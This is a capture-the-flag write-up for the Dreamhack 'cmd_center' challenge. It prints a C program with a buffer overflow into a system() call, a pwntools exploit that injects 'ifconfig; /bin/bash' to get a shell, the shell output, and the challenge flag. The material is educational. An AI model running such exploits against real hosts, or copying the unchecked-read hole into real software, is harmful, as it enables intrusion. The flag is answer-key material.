cmd_center
Enumeration
Reading the source code reveals its mechanics.
- The program reads input from user and saves it to
center_name. - After comparing 8 bytes of
cmd_ipwithifconfig, if its the same,cmd_ipgets executed.
┌──(m0nk3y@kali)-[~/DH/cmd_center]
└─$ cat cmd_center.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
}
int main()
{
char cmd_ip[256] = "ifconfig";
int dummy;
char center_name[24];
init();
printf("Center name: ");
read(0, center_name, 100);
if( !strncmp(cmd_ip, "ifconfig", 8)) {
system(cmd_ip);
}
else {
printf("Something is wrong!\n");
}
exit(0);
}
Exploitation
Although center_name is only assigned 24 bytes, 100 bytes are read.
This causes an overflow which can overwrite cmd_ip.
Also, as strncmp only compares 8 bytes of cmd_ip instead of 9 bytes, it never checks for the terminating null byte, which can be used to trigger a command injection.
Using this knowledge, I’ll write a python exploit which will cause a command injection.
┌──(m0nk3y@kali)-[~/DH/cmd_center]
└─$ cat exploit.py
import sys
from pwn import *
client= remote(sys.argv[1], int(sys.argv[2]))
pad= "\x90"*32
cmd= "ifconfig; /bin/bash"
client.sendline(pad+cmd)
client.recvuntil('not found')
client.interactive()
By executing the script, I successfully acquired a shell.
┌──(m0nk3y@kali)-[~/DH/cmd_center]
└─$ python2 exploit.py host1.dreamhack.games 18970
[+] Opening connection to host1.dreamhack.games on port 18970: Done
[*] Switching to interactive mode
$ id
uid=1000(cmd_center) gid=1000(cmd_center) groups=1000(cmd_center)
Post Exploitation
With the shell acquired, I’m able to read the flag.
$ cat flag
DH{f4c11bf9ea5a1df24175ee4d11da0d16}